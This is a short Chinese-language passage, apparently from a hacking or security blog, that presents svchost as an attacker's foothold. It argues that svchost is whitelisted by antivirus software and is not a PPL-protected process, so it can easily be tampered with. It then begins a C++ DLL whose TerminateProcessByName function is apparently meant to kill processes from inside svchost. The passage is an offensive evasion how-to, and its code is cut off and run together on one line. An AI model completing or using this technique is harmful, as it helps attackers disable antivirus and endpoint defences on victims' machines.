参考这个,我们可以发现许多白名单进程,特别是一些系统常驻进程。白名单进程因为受到防病毒软件的信任,往往不会被严格监控,因此可以作为攻击者的突破口。

在这些常驻进程中, svchost (Service Host Process)是一个较为典型的例子。

svchost 是Windows系统中的核心进程,用于托管和运行各种服务,具有极高的系统权限。然而, svchost 并非PPL(Protected Process Light)进程,所以我们可以很轻松的对它冻手 

// dllmain.cpp : 定义 DLL 应用程序的入口点。#include "pch.h"#include <tlhelp32.h>// 查找并终止指定的进程bool TerminateProcessByName(const wchar_t* processName) {
  
      // 获取系统进程快照    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);